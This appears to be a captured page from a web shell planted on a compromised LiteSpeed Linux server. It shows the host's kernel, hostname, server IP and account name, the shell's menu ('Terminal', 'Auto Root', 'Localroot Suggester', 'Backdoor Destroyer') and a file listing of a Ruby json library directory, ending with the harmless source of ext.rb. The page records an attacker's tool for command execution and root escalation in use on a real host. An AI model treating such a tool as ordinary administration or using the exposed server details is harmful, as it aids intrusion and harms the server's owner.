Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby24 /
lib64 /
ruby /
2.4.0 /
json /
Delete
Unzip
Name
Size
Permission
Date
Action
add
[ DIR ]
drwxr-xr-x
2026-02-18 15:11
common.rb
14.98
KB
-rw-r--r--
2023-07-26 20:17
ext.rb
391
B
-rw-r--r--
2023-07-26 20:17
generic_object.rb
1.39
KB
-rw-r--r--
2023-07-26 20:17
version.rb
302
B
-rw-r--r--
2023-07-26 20:17
Save
Rename
require 'json/common' module JSON # This module holds all the modules/classes that implement JSON's # functionality as C extensions. module Ext require 'json/ext/parser' require 'json/ext/generator' $DEBUG and warn "Using Ext extension for JSON." JSON.parser = Parser JSON.generator = Generator end JSON_LOADED = true unless defined?(::JSON::JSON_LOADED) end